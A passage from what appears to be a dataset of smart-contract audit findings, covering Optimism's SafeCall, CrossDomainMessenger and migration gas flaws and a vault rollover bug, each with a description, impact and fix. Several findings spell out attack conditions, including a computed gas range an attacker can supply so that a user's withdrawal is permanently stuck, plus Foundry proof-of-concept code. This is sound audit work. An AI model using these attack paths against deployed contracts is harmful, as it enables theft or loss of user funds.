account.\\n```\\nFile: core\\vm\\gas_table.go\\nfunc gasCall(evm *EVM, contract *Contract, stack *Stack, mem *Memory, memorySize uint64) (uint64, error) {\\n var (\\n gas uint64\\n transfersValue = !stack.Back(2).IsZero()\\n address = common.Address(stack.Back(1).Bytes20())\\n )\\n if evm.chainRules.IsEIP158 {\\n if transfersValue && evm.StateDB.Empty(address) {\\n gas += params.CallNewAccountGas\\n }\\n } else if !evm.StateDB.Exist(address) {\\n gas += params.CallNewAccountGas\\n }\\n if transfersValue {\\n gas += params.CallValueTransferGas\\n }\\n memoryGas, err := memoryGasCost(mem, memorySize)\\n if err != nil {\\n return 0, err\\n }\\n var overflow bool\\n if gas, overflow = math.SafeAdd(gas, memoryGas); overflow {\\n return 0, ErrGasUintOverflow\\n }\\n\\n evm.callGasTemp, err = callGas(evm.chainRules.IsEIP150, contract.Gas, gas, stack.Back(0))\\n if err != nil {\\n return 0, err\\n }\\n if gas, overflow = math.SafeAdd(gas, evm.callGasTemp); overflow {\\n return 0, ErrGasUintOverflow\\n }\\n return gas, nil\\n}\\n```\\n\\nThe `raw` extra gas for transferring value is\\n```\\nparams.CallValueTransferGas - params.CallStipend * 64 / 63 = 9000 - 2300 * 64 / 63 = 6664\\n```\\n\\nSecondly, EIP-2929 also affects the gas cost of `CALL` opcode.\\n```\\nFile: core\\vm\\operations_acl.go\\n gasCallEIP2929 = makeCallVariantGasCallEIP2929(gasCall)\\n\\nFile: core\\vm\\operations_acl.go\\nfunc makeCallVariantGasCallEIP2929(oldCalculator gasFunc) gasFunc {\\n return func(evm *EVM, contract *Contract, stack *Stack, mem *Memory, memorySize uint64) (uint64, error) {\\n addr := common.Address(stack.Back(1).Bytes20())\\n // Check slot presence in the access list\\n warmAccess := evm.StateDB.AddressInAccessList(addr)\\n // The WarmStorageReadCostEIP2929 (100) is already deducted in the form of a constant cost, so\\n // the cost to charge for cold access, if any, is Cold - Warm\\n coldCost := params.ColdAccountAccessCostEIP2929 - params.WarmStorageReadCostEIP2929\\n if !warmAccess {\\n evm.StateDB.AddAddressToAccessList(addr)\\n // Charge the remaining difference here already, to correctly calculate available\\n // gas for call\\n if !contract.UseGas(coldCost) {\\n return 0, ErrOutOfGas\\n }\\n }\\n // Now call the old calculator, which takes into account\\n // - create new account\\n // - transfer value\\n // - memory expansion\\n // - 63/64ths rule\\n gas, err := oldCalculator(evm, contract, stack, mem, memorySize)\\n if warmAccess || err != nil {\\n return gas, err\\n }\\n // In case of a cold access, we temporarily add the cold charge back, and also\\n // add it to the returned gas. By adding it to the return, it will be charged\\n // outside of this function, as part of the dynamic gas, and that will make it\\n // also become correctly reported to tracers.\\n contract.Gas += coldCost\\n return gas + coldCost, nil\\n }\\n}\\n```\\n\\nHere is a test script to show the impact of the two aspects mentioned above\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.15;\\n\\nimport ""forge-std/Test.sol"";\\nimport ""forge-std/console.sol"";\\n\\nlibrary SafeCall {\\n function callWithMinGas(\\n address _target,\\n uint256 _minGas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n uint256 gasSent;\\n assembly {\\n // Assertion: gasleft() >= ((_minGas + 200) * 64) / 63\\n //\\n // Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call\\n // frame may be passed to a subcontext, we need to ensure that the gas will not be\\n // truncated to hold this function's invariant: ""If a call is performed by\\n // `callWithMinGas`, it must receive at least the specified minimum gas limit."" In\\n // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL`\\n // opcode, so it is factored in with some extra room for error.\\n if lt(gas(), div(mul(64, add(_minGas, 200)), 63)) {\\n // Store the ""Error(string)"" selector in scratch space.\\n mstore(0, 0x08c379a0)\\n // Store the pointer to the string length in scratch space.\\n mstore(32, 32)\\n // Store the string.\\n //\\n // SAFETY:\\n // - We pad the beginning of the string with two zero bytes as well as the\\n // length (24) to ensure that we override the free memory pointer at offset\\n // 0x40. This is necessary because the free memory pointer is likely to\\n // be greater than 1 byte when this function is called, but it is incredibly\\n // unlikely that it will be greater than 3 bytes. As for the data within\\n // 0x60, it is ensured that it is 0 due to 0x60 being the zero offset.\\n // - It's fine to clobber the free memory pointer, we're reverting.\\n mstore(\\n 88,\\n 0x0000185361666543616c6c3a204e6f7420656e6f75676820676173\\n )\\n\\n // Revert with 'Error(""SafeCall: Not enough gas"")'\\n revert(28, 100)\\n }\\n\\n // The call will be supplied at least (((_minGas + 200) * 64) / 63) - 49 gas due to the\\n // above assertion. This ensures that, in all circumstances, the call will\\n // receive at least the minimum amount of gas specified.\\n // We can prove this property by solving the inequalities:\\n // ((((_minGas + 200) * 64) / 63) - 49) >= _minGas\\n // ((((_minGas + 200) * 64) / 63) - 51) * (63 / 64) >= _minGas\\n // Both inequalities hold true for all possible values of `_minGas`.\\n gasSent := gas() // @audit this operation costs 2 gas\\n _success := call(\\n gas(), // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 32), // inloc\\n mload(_calldata), // inlen\\n 0x00, // outloc\\n 0x00 // outlen\\n )\\n }\\n console.log(""gasSent ="", gasSent);\\n return _success;\\n }\\n}\\n\\ncontract Callee {\\n fallback() external payable {\\n uint256 gas = gasleft();\\n console.log(""gasReceived ="", gas);\\n }\\n}\\n\\ncontract Caller {\\n function execute(\\n address _target,\\n uint256 _minGas,\\n bytes memory _calldata\\n ) external payable {\\n SafeCall.callWithMinGas(_target, _minGas, msg.value, _calldata);\\n }\\n}\\n\\ncontract TestCallWithMinGas is Test {\\n address callee;\\n Caller caller;\\n\\n function setUp() public {\\n callee = address(new Callee());\\n caller = new Caller();\\n }\\n\\n function testCallWithMinGas() public {\\n console.log(""-------1st call------"");\\n caller.execute{gas: 64_855}(callee, 63_000, """");\\n\\n console.log(""\\n -------2nd call------"");\\n caller.execute{gas: 64_855}(callee, 63_000, """");\\n\\n console.log(""\\n -------3rd call------"");\\n caller.execute{gas: 62_555, value: 1}(callee, 63_000, """");\\n }\\n}\\n```\\n\\nAnd the log would be\\n```\\nRunning 1 test for test/TestCallWithMinGas.sol:TestCallWithMinGas\\n[PASS] testCallWithMinGas() (gas: 36065)\\nLogs:\\n -------1st call------\\n gasReceived = 60582\\n gasSent = 64200\\n\\n -------2nd call------\\n gasReceived = 63042\\n gasSent = 64200\\n\\n -------3rd call------\\n gasReceived = 56483\\n gasSent = 64200\\n```\\n\\nThe difference between `1st call` and `2nd call` is caused by EIP-2929, and the difference between `2nd call` and `3rd call` is caused by transferring value. We can see the actual received gas in the sub-contract is less than the 63,000 `_minGas` limit in both 1st and `3rd call`.",The migration logic may look like\\n```\\nif (_value == 0) {\\n gasleft() >= ((_minGas + 200) * 64) / 63 + 2600\\n} else {\\n gasleft() >= ((_minGas + 200) * 64) / 63 + 2600 + 6700\\n}\\n```\\n,"`SafeCall.callWithMinGas()` is a key design to ensure withdrawal transactions will be executed with more gas than the limit specified by users. This issue breaks the specification. Finalizing withdrawal transactions with less than specified gas limit may fail unexpectedly due to out of gas, lead to loss of funds.","```\\nFile: contracts\\libraries\\SafeCall.sol\\n function callWithMinGas(\\n address _target,\\n uint256 _minGas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly {\\n // Assertion: gasleft() >= ((_minGas + 200) * 64) / 63\\n //\\n // Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call\\n // frame may be passed to a subcontext, we need to ensure that the gas will not be\\n // truncated to hold this function's invariant: ""If a call is performed by\\n // `callWithMinGas`, it must receive at least the specified minimum gas limit."" In\\n // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL`\\n // opcode, so it is factored in with some extra room for error.\\n if lt(gas(), div(mul(64, add(_minGas, 200)), 63)) {\\n // Store the ""Error(string)"" selector in scratch space.\\n mstore(0, 0x08c379a0)\\n // Store the pointer to the string length in scratch space.\\n mstore(32, 32)\\n // Store the string.\\n //\\n // SAFETY:\\n // - We pad the beginning of the string with two zero bytes as well as the\\n // length (24) to ensure that we override the free memory pointer at offset\\n // 0x40. This is necessary because the free memory pointer is likely to\\n // be greater than 1 byte when this function is called, but it is incredibly\\n // unlikely that it will be greater than 3 bytes. As for the data within\\n // 0x60, it is ensured that it is 0 due to 0x60 being the zero offset.\\n // - It's fine to clobber the free memory pointer, we're reverting.\\n mstore(88, 0x0000185361666543616c6c3a204e6f7420656e6f75676820676173)\\n\\n // Revert with 'Error(""SafeCall: Not enough gas"")'\\n revert(28, 100)\\n }\\n\\n // The call will be supplied at least (((_minGas + 200) * 64) / 63) - 49 gas due to the\\n // above assertion. This ensures that, in all circumstances, the call will\\n // receive at least the minimum amount of gas specified.\\n // We can prove this property by solving the inequalities:\\n // ((((_minGas + 200) * 64) / 63) - 49) >= _minGas\\n // ((((_minGas + 200) * 64) / 63) - 51) * (63 / 64) >= _minGas\\n // Both inequalities hold true for all possible values of `_minGas`.\\n _success := call(\\n gas(), // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 32), // inloc\\n mload(_calldata), // inlen\\n 0x00, // outloc\\n 0x00 // outlen\\n )\\n }\\n return _success;\\n }\\n```\\n" +"CrossDomainMessenger does not successfully guarantee replayability, can lose user funds",medium,"While `SafeCall.callWithMinGas` successfully ensures that the called function will not revert, it does not ensure any remaining buffer for continued execution on the calling contract.\\nAs a result, there are situations where `OptimismPortal` can be called with an amount of gas such that the remaining gas after calling `L1CrossDomainMessenger` is sufficient to finalize the transaction, but such that the remaining gas after `L1CrossDomainMessenger` makes its call to target is insufficient to mark the transaction as successful or failed.\\nIn any of these valid scenarios, users who withdraw using the L1CrossDomainMessenger (expecting replayability) will have their withdrawals bricked, permanently losing their funds.\\nWhen a user performs a withdrawal with the `L1CrossDomainMessenger`, they include a `gasLimit` value, which specifies the amount of gas that is needed for the function to execute on L1.\\nThis value is translated into two separate values:\\nThe `OptimismPortal` sends at least baseGas(_message, _minGasLimit) = 64/63 * `_minGasLimit` + 16 * data.length + 200_000 to `L1CrossDomainMessenger`, which accounts for the additional overhead used by the Cross Domain Messenger.\\nThe `L1CrossDomainMessenger` sends at least `_minGasLimit` to the target contract.\\nThe core of this vulnerability is in the fact that, if:\\n`OptimismPortal` retains sufficient gas after its call to complete the transaction, and\\n`L1CrossDomainMessenger` runs out of gas after its transaction is complete (even if the tx succeeded)\\n...then the result will be that the transaction is marked as finalized in the Portal (disallowing it from being called again), while the Cross Domain Messenger transaction will revert, causing the target transaction to revert and not setting it in `failedMessages` (disallowing it from being replayed). The result is that the transaction will be permanently stuck.\\nCalcuations\\nLet's run through the math to see how this might unfold. We will put aside the additional gas allocated for calldata length, because this amount is used up in the call and doesn't materially impact the calculations.\\nWhen the `OptimismPortal` calls the `L1CrossDomainMessenger`, it is enforced that the gas sent will be greater than or equal to `_minGasLimit * 64/63 + 200_000`.\\nThis ensures that the remaining gas for the `OptimismPortal` to continue execution after the call is at least `_minGasLimit / 64 + 3125`. Even assuming that `_minGasLimit == 0`, this is sufficient for `OptimismPortal` to complete execution, so we can safely say that any time `OptimismPortal.finalizeWithdrawalTransaction()` is called with sufficient gas to pass the `SafeCall.callWithMinGas()` check, it will complete execution.\\nMoving over to `L1CrossDomainMessenger`, our call begins with at least `_minGasLimit * 64/63 + 200_000` gas. By the time we get to the external call, we have remaining gas of at least `_minGasLimit * 64/63 + 158_998`. This leaves us with the following guarantees:\\nGas available for the external call will be at least 63/64ths of that, which equals `_minGasLimit + 156_513`.\\nGas available for continued execution after the call will be at least 1/64th of that, which equals `_minGasLimit * 1/63 + 3125`.\\nThe additional gas required to mark the transaction as `failedMessages[versionedHash] = true` and complete the rest of the execution is `23,823`.\\nTherefore, in any situation where the external call uses all the available gas will revert if `_minGasLimit * 1/63 + 3125 < 23_823`, which simplifies to `_minGasLimit < 1_303_974`. In other words, in most cases.\\nHowever, it should be unusual for the external call to use all the available gas. In most cases, it should only use `_minGasLimit`, which would leave `156_513` available to resolve this issue.\\nSo, let's look at some examples of times when this may not be the case.\\nAt Risk Scenarios\\nThere are several valid scenarios where users might encounter this issue, and have their replayable transactions stuck:\\nUser Sends Too Little Gas\\nThe expectation when using the Cross Domain Messenger is that all transactions will be replayable. Even if the `_minGasLimit` is set incorrectly, there will always be the opportunity to correct this by replaying it yourself with a higher gas limit. In fact, it is a core tenet of the Cross Domain Messengers that they include replay protection for failed transactions.\\nHowever, if a user sets a gas limit that is too low for a transaction, this issue may result.\\nThe consequence is that, while users think that Cross Domain Messenger transactions are replayable and gas limits don't need to be set precisely, they can in fact lose their entire withdrawal if they set their gas limit too low, even when using the ""safe"" Standard Bridge or Cross Domain Messenger.\\nTarget Contract Uses More Than Minimum Gas\\nThe checks involved in this process ensure that sufficient gas is being sent to a contract, but there is no requirement that that is all the gas a contract uses.\\n`_minGasLimit` should be set sufficiently high for the contract to not revert, but that doesn't mean that `_minGasLimit` represents the total amount of gas the contract uses.\\nAs a silly example, let's look at a modified version of the `gas()` function in your `Burn.sol` contract:\\n```\\nfunction gas(uint256 _amountToLeave) internal view {\\n uint256 i = 0;\\n while (gasleft() > _amountToLeave) {\\n ++i;\\n }\\n}\\n```\\n\\nThis function runs until it leaves a specified amount of gas, and then returns. While the amount of gas sent to this contract could comfortably exceed the `_minGasLimit`, it would not be safe to assume that the amount leftover afterwards would equal `startingGas - _minGasLimit`.\\nWhile this is a contrived example, but the point is that there are many situations where it is not safe to assume that the minimum amount of gas a function needs will be greater than the amount it ends up using, if it is provided with extra gas.\\nIn these cases, the assumption that our leftover gas after the function runs will be greater than the required 1/64th does not hold, and the withdrawal can be bricked.",`L1CrossDomainMessenger` should only send `_minGasLimit` along with its call to the target (rather than gas()) to ensure it has sufficient leftover gas to ensure replayability.,"In certain valid scenarios where users decide to use the ""safe"" Cross Domain Messenger or Standard Bridge with the expectation of replayability, their withdrawals from L2 to L1 can be bricked and permanently lost.",```\\nfunction gas(uint256 _amountToLeave) internal view {\\n uint256 i = 0;\\n while (gasleft() > _amountToLeave) {\\n ++i;\\n }\\n}\\n```\\n +"Gas usage of cross-chain messages is undercounted, causing discrepancy between L1 and L2 and impacting intrinsic gas calculation",medium,"Gas consumption of messages sent via CrossDomainMessenger (including both L1CrossDomainMessenger and L2CrossDomainMessenger) is calculated incorrectly: the gas usage of the ""relayMessage"" wrapper is not counted. As a result, the actual gas consumption of sending a message will be higher than expected. Users will pay less for gas on L1, and L2 blocks may be filled earlier than expected. This will also affect gas metering via ResourceMetering: metered gas will be lower than actual consumed gas, and the EIP-1559-like gas pricing mechanism won't reflect the actual demand for gas.\\nThe CrossDomainMessenger.sendMessage function is used to send cross-chain messages. Users are required to set the `_minGasLimit` argument, which is the expected amount of gas that the message will consume on the other chain. The function also computes the amount of gas required to pass the message to the other chain: this is done in the `baseGas` function, which computes the byte-wise cost of the message. `CrossDomainMessenger` also allows users to replay their messages on the destination chain if they failed: to allow this, the contract wraps user messages in `relayMessage` calls. This increases the size of messages, but the `baseGas` call above counts gas usage of only the original, not wrapped in the `relayMessage` call, message.\\nThis contradicts the intrinsic gas calculation in `op-geth`, which calculates gas of an entire message data:\\n```\\ndataLen := uint64(len(data))\\n// Bump the required gas by the amount of transactional data\\nif dataLen > 0 {\\n // rest of code\\n}\\n```\\n\\nThus, there's a discrepancy between the contract and the node, which will result in the node consuming more gas than users paid for.\\nThis behaviour also disagrees with how the migration process works:\\nwhen migrating pre-Bedrock withdrawals, `data` is the entire messages, including the `relayMessage` calldata;\\nthe gas limit of migrated messages is computed on the entire `data`.\\nTaking into account the logic of paying cross-chain messages' gas consumption on L1, I think the implementation in the migration code is correct and the implementation in `CrossDomainMessenger` is wrong: users should pay for sending the entire cross-chain message, not just the calldata that will be execute on the recipient on the other chain.","When counting gas limit in the `CrossDomainMessenger.sendMessage` function, consider counting the entire message, including the `relayMessage` calldata wrapping. Consider a change like that:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol b/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol\\nindex f67021010..5239feefd 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/packages/contracts// Remove the line below\\nbedrock/contracts/universal/CrossDomainMessenger.sol\\n@@ // Remove the line below\\n253,19 // Add the line below\\n253,20 @@ abstract contract CrossDomainMessenger is\\n // message is the amount of gas requested by the user PLUS the base gas value. We want to\\n // guarantee the property that the call to the target contract will always have at least\\n // the minimum gas limit specified by the user.\\n// Add the line below\\n bytes memory wrappedMessage = abi.encodeWithSelector(\\n// Add the line below\\n this.relayMessage.selector,\\n// Add the line below\\n messageNonce(),\\n// Add the line below\\n msg.sender,\\n// Add the line below\\n _target,\\n// Add the line below\\n msg.value,\\n// Add the line below\\n _minGasLimit,\\n// Add the line below\\n _message\\n// Add the line below\\n );\\n _sendMessage(\\n OTHER_MESSENGER,\\n// Remove the line below\\n baseGas(_message, _minGasLimit),\\n// Add the line below\\n baseGas(wrappedMessage, _minGasLimit),\\n msg.value,\\n// Remove the line below\\n abi.encodeWithSelector(\\n// Remove the line below\\n this.relayMessage.selector,\\n// Remove the line below\\n messageNonce(),\\n// Remove the line below\\n msg.sender,\\n// Remove the line below\\n _target,\\n// Remove the line below\\n msg.value,\\n// Remove the line below\\n _minGasLimit,\\n// Remove the line below\\n _message\\n// Remove the line below\\n )\\n// Add the line below\\n wrappedMessage\\n );\\n\\n emit SentMessage(_target, msg.sender, _message, messageNonce(), _minGasLimit);\\n```\\n","Since the `CrossDomainMessenger` contract is recommended to be used as the main cross-chain messaging contract and since it's used by both L1 and L2 bridges (when bridging ETH or ERC20 tokens), the undercounted gas will have a broad impact on the system. It'll create a discrepancy in gas usage and payment on L1 and L2: on L1, users will pay for less gas than actually will be consumed by cross-chain messages.\\nAlso, since messages sent from L1 to L2 (via OptimismPortal.depositTransaction) are priced using an EIP-1559-like mechanism (via ResourceMetering._metered), the mechanism will fail to detect the actual demand for gas and will generally set lower gas prices, while actual gas consumption will be higher.\\nThe following bytes are excluded from gas usage counting:\\nthe 4 bytes of the `relayMessage` selector;\\nthe 32 bytes of the message nonce;\\nthe address of the sender (20 bytes);\\nthe address of the recipient (20 bytes);\\nthe amount of ETH sent with the message (32 bytes);\\nthe minimal gas limit of the nested message (32 bytes).\\nThus, every cross-chain message sent via the bridge or the messenger will contain 140 bytes that won't be paid by users. The bytes will however be processed by the node and accounted in the gas consumption.",```\\ndataLen := uint64(len(data))\\n// Bump the required gas by the amount of transactional data\\nif dataLen > 0 {\\n // rest of code\\n}\\n```\\n +Malicious actor can prevent migration by calling a non-existing function in `OVM_L2ToL1MessagePasser` and making `ReadWitnessData` return an error,medium,"There is a mismatch between collected witness data in l2geth to the parsing of the collected data during migration. The mismatch will return an error and halt the migration until the data will be cleaned.\\nWitness data is collected from L2geth using a state dumper that collects any call to `OVM_L2ToL1MessagePasser`. The data is collected regardless of the calldata itself. Any call to `OVM_L2ToL1MessagePasser` will be collected. The data will persist regardless of the status of the transaction.\\n```\\n func (evm *EVM) Call(caller ContractRef, addr common.Address, input []byte, gas uint64, value *big.Int) (ret []byte, leftOverGas uint64, err error) { \\n if addr == dump.MessagePasserAddress { \\n statedumper.WriteMessage(caller.Address(), input) \\n } \\n```\\n\\nThe data will be stored in a file in the following format: ""MSG||""\\nAt the start of the migration process, in order to unpack the message from the calldata, the code uses the first 4 bytes to lookup the the selector of `passMessageToL1` from the calldata and unpack the calldata according to the ABI.\\n```\\n method, err := abi.MethodById(msgB[:4])\\n if err != nil {\\n return nil, nil, fmt.Errorf(""failed to get method: %w"", err)\\n }\\n\\n out, err := method.Inputs.Unpack(msgB[4:])\\n if err != nil {\\n return nil, nil, fmt.Errorf(""failed to unpack: %w"", err)\\n }\\n```\\n\\nAs can be seen above, the function will return an error that is bubbled up to stop the migration if:\\nThe calldata first 4 bytes is not a selector of a function from the ABI of `OVM_L2ToL1MessagePasser`\\nThe parameters encoded with the selectors are not unpackable (are not the parameters specified by the ABI)\\nA malicious actor will call any non-existing function in the address of `OVM_L2ToL1MessagePasser`. The message will be stored in the witness data and cause an error during migration.\\n`ReadWitnessData` is called to parse they json witness data before any filtering is in place.","Instead of bubbling up an error, simply continue to the next message. This shouldn't cause a problem since in the next stages of the migration there are checks to validate any missing messages from the storage.",An arbitrary user can halt the migration process,"```\\n func (evm *EVM) Call(caller ContractRef, addr common.Address, input []byte, gas uint64, value *big.Int) (ret []byte, leftOverGas uint64, err error) { \\n if addr == dump.MessagePasserAddress { \\n statedumper.WriteMessage(caller.Address(), input) \\n } \\n```\\n" +Causing users lose fund if bridging long message from L2 to L1 due to uncontrolled out-of-gas error,medium,"If the amount of gas provided during finalizing withdrawal transactions passes the check in `callWithMinGas`, it is not guaranteed that the relaying message transaction does not go out of gas. This can happen if the bridged message from L2 to L1 is long enough to increase the gas consumption significantly so that the predicted `baseGas` is not accurate enough.\\nSo far so good.\\nAs a result, while the transaction `OptimismPortal.finalizeWithdrawalTransaction` sets the flag `finalizedWithdrawals[withdrawalHash]` as `true`, the flags `failedMessages[versionedHash]` and `successfulMessages[versionedHash]` are `false`. So, the users can not replay their message, and his fund is lost.\\nThe question is that is there any possibility that `L1CrossDomainMessenger` reverts due to OOG, even though the required gas is calculated in L2 in the function `baseGas`?\\nSo, the amount of gas available to `L1CrossDomainMessenger` will be: `(G - K1 - 51)*(63/64)` Please note this number is based on the estimation of gas consumption explained in the comment:\\n// Because EIP-150 ensures that, a maximum of 63/64ths of the remaining gas in the call // frame may be passed to a subcontext, we need to ensure that the gas will not be // truncated to hold this function's invariant: ""If a call is performed by // `callWithMinGas`, it must receive at least the specified minimum gas limit."" In // addition, exactly 51 gas is consumed between the below `GAS` opcode and the `CALL` // opcode, so it is factored in with some extra room for error.\\nIn the function `L1CrossDomainMessenger.relayMessage`, some gas will be consumed from line 299 to line 360. For simplicity, I call this amount of gas `K2 + HashingGas`, i.e. the consumed gas is separated for later explanation. In other words, the sum of consumed gas from line 299 to 303 and the consumed gas from line 326 to 360, is called `K2`, and the consumed gas from line 304 to line 325 is called `HashingGas`.\\nSo, the `gasLeft()` in line 361 will be: `(G - K1 - 51)*(63/64) - K2 - HashingGas`\\nTo pass the condition `gasleft() >= ((_minGas + 200) * 64) / 63` in `L1CrossDomainMessenger`, it is necessary to have: `(G - K1 - 51)*(63/64) - K2 - HashingGas >= ((_minGas + 200) * 64) / 63` Please note that, `_minGas` here is equal to `_minGasLimit` which is the amount of gas set by the user to be forwarded to the final receiver on L1. So, after simplification: `G >= [((_minGasLimit + 200) * 64) / 63 + K2 + HashingGas] *(64/63) + 51 + K1`\\nAll in all:\\nTo pass the gas check in OptimismPortal: `G >= ((_minGasLimit * (1016/1000) + messageLength * 16 + 200_000 + 200) * 64) / 63 + K1`\\nTo pass the gas check in L1CrossDomainMessenger: `G >= [((_minGasLimit + 200) * 64) / 63 + K2 + HashingGas] *(64/63) + 51 + K1`\\nIf, `G` is between these two numbers (bigger than the first one, and smaller than the second one), it will pass the check in `OptimismPortal`, but it will revert in `L1CrossDomainMessenger`, as a result it is possible to attack.\\nSince, K1 and K2 are almost equal to 50_000, after simplification:\\n`G >= (_minGasLimit * (1016/1000) + messageLength * 16 ) * (64 / 63) + 253_378`\\n`G >= (_minGasLimit * (64 / 63) + HashingGas) *(64/63) + 101_051`\\nSo it is necessary to satisfy the following condition to be able to attack (in that case it is possible that the attacker provides gas amount between the higher and lower bound to execute the attack): (_minGasLimit * (1016/1000) + messageLength * 16 ) * (64 / 63) + 253_378 < (_minGasLimit * (64 / 63) + HashingGas) *(64/63) + 101_051After simplification, we have:messageLength < (HashingGas - 150_000) / 16`\\nPlease note that the `HashingGas` is a function of `messageLength`. In other words, the consumed gas from Line 304 to 325 is a function of `messageLength`, the longer length the higher gas consumption, but the relation is not linear, it is exponential.**\\nSo, for version zero, the condition can be relaxed to: `messageLength < (HashingGas * 2 - 150_000) / 16`\\nThe calculation shows that if the `messageLength` is equal to 1 mb for version 0, the gas consumed during hashing will be around 23.5M gas (this satisfies the condition above). While, if the `messageLength` is equal to 512 kb for version 0, the gas consumed during hashing will be around 7.3M gas (this does not satisfy the condition above marginally).\\nA short summary of calculation is:\\nmessageLength= 128 kb, HashingGas for v1= 508_000, HahingGas for v0= 1_017_287, attack not possible messageLength= 256 kb, HashingGas for v1= 1_290_584, HahingGas for v0= 2_581_168, attack not possible messageLength= 512 kb, HashingGas for v1= 3_679_097, HahingGas for v0= 7_358_194, attack not possible messageLength= 684 kb, HashingGas for v1= 5_901_416, HahingGas for v0= 11_802_831, attack possible messageLength= 1024 kb, HashingGas for v1= 11_754_659, HahingGas for v0= 23_509_318, attack possible\\n\\nWhich can be calculated approximately by:\\n```\\nfunction checkGasV1(bytes calldata _message)\\n public\\n view\\n returns (uint256, uint256)\\n {\\n uint256 gas1 = gasleft();\\n bytes32 versionedHash = Hashing.hashCrossDomainMessageV1(\\n 0,\\n address(this),\\n address(this),\\n 0,\\n 0,\\n _message\\n );\\n uint256 gas2 = gasleft();\\n return (_message.length, (gas1 - gas2));\\n }\\n```\\n\\n```\\nfunction checkGasV0(bytes calldata _message)\\n public\\n view\\n returns (\\n uint256,\\n uint256,\\n uint256\\n )\\n {\\n uint256 gas1 = gasleft();\\n bytes32 versionedHash1 = Hashing.hashCrossDomainMessageV0(\\n address(this),\\n address(this),\\n _message,\\n 0\\n );\\n uint256 gas2 = gasleft();\\n uint256 gas3 = gasleft();\\n bytes32 versionedHash2 = Hashing.hashCrossDomainMessageV1(\\n 0,\\n address(this),\\n address(this),\\n 0,\\n 0,\\n _message\\n );\\n uint256 gas4 = gasleft();\\n return (_message.length, (gas1 - gas2), (gas3 - gas4));\\n }\\n```\\n\\nIt means that if for example the `messageLength` is equal to 684 kb (mostly non-zero, only 42 kb zero), and the message is version 0, and for example the `_minGasLimit` is equal to 21000, an attacker can exploit the user's withdrawal transaction by providing a gas meeting the following condition: `(_minGasLimit * (1016/1000) + 684 * 1024 * 16 ) * (64 / 63) + 253_378 < G < (_minGasLimit * (64 / 63) + 11_802_831) *(64/63) + 101_051` After, replacing the numbers, the provided gas by the attacker should be: `11_659_592 < G < 12_112_900` So, by providing almost 12M gas, it will pass the check in `OptimismPortal`, but it will revert in `L1CrossDomainMessenger` due to OOG, as a result the user's transaction will not be allowed to be replayed.\\nPlease note that if there is a long time between request of withdrawal transaction on L2 and finalizing withdrawal transaction on L1, it is possible that the gas price is low enough on L1, so economically reasonable for the attacker to execute it.\\nIn Summary:\\nWhen calculating the `baseGas` on L2, only the `minGasLimit` and `message.length` are considered, and a hardcoded overhead is also added. While, the hashing mechanism (due to memory expansion) is exponentially related to the length of the message. It means that, the amount of gas usage during relaying the message can be increased to the level that is higher than calculated value in `baseGas`. So, if the length of the message is long enough (to increase the gas significantly due to memory expansion), it provides an attack surface so that the attacker provides the amount of gas that only pass the condition in `OptimismPortal`, but goes out of gas in `L1CrossDomainMessenger`.","If all the gas is consumed before reaching to L361, the vulnerability is available. So, it is recommended to include memory expansion effect when calculating `baseGas`.","Users will lose fund because it is set as finalized, but not set as failed. So, they can not replay it.","```\\nfunction checkGasV1(bytes calldata _message)\\n public\\n view\\n returns (uint256, uint256)\\n {\\n uint256 gas1 = gasleft();\\n bytes32 versionedHash = Hashing.hashCrossDomainMessageV1(\\n 0,\\n address(this),\\n address(this),\\n 0,\\n 0,\\n _message\\n );\\n uint256 gas2 = gasleft();\\n return (_message.length, (gas1 - gas2));\\n }\\n```\\n" +Funds can be stolen because of incorrect update to `ownerToRollOverQueueIndex` for existing rollovers,high,"In the case where the owner has an existing rollover, the `ownerToRollOverQueueIndex` incorrectly updates to the last queue index. This causes the `notRollingOver` check to be performed on the incorrect `_id`, which then allows the depositor to withdraw funds that should've been locked.\\nIn `enlistInRollover()`, if the user has an existing rollover, it overwrites the existing data:\\n```\\nif (ownerToRollOverQueueIndex[_receiver] != 0) {\\n // if so, update the queue\\n uint256 index = getRolloverIndex(_receiver);\\n rolloverQueue[index].assets = _assets;\\n rolloverQueue[index].epochId = _epochId;\\n```\\n\\nHowever, regardless of whether the user has an existing rollover, the `ownerToRolloverQueueIndex` points to the last item in the queue:\\n```\\nownerToRollOverQueueIndex[_receiver] = rolloverQueue.length;\\n```\\n\\nThus, the `notRollingOver` modifier will check the incorrect item for users with existing rollovers:\\n```\\nQueueItem memory item = rolloverQueue[getRolloverIndex(_receiver)];\\nif (\\n item.epochId == _epochId &&\\n (balanceOf(_receiver, _epochId) - item.assets) < _assets\\n) revert AlreadyRollingOver();\\n```\\n\\nallowing the user to withdraw assets that should've been locked.","The `ownerToRollOverQueueIndex` should be pointing to the last item in the queue in the `else` case only: when the user does not have an existing rollover queue item.\\n```\\n} else {\\n // if not, add to queue\\n rolloverQueue.push(\\n QueueItem({\\n assets: _assets,\\n receiver: _receiver,\\n epochId: _epochId\\n })\\n );\\n// Add the line below\\n ownerToRollOverQueueIndex[_receiver] = rolloverQueue.length;\\n}\\n// Remove the line below\\n ownerToRollOverQueueIndex[_receiver] = rolloverQueue.length;\\n```\\n",Users are able to withdraw assets that should've been locked for rollovers.,"```\\nif (ownerToRollOverQueueIndex[_receiver] != 0) {\\n // if so, update the queue\\n uint256 index = getRolloverIndex(_receiver);\\n rolloverQueue[index].assets = _assets;\\n rolloverQueue[index].epochId = _epochId;\\n```\\n" +"When rolling over, user will lose his winnings from previous epoch",high,"When `mintRollovers` is called, when the function mints shares for the new epoch for the user, the amount of shares minted will be the same as the original assets he requested to rollover - not including the amount he 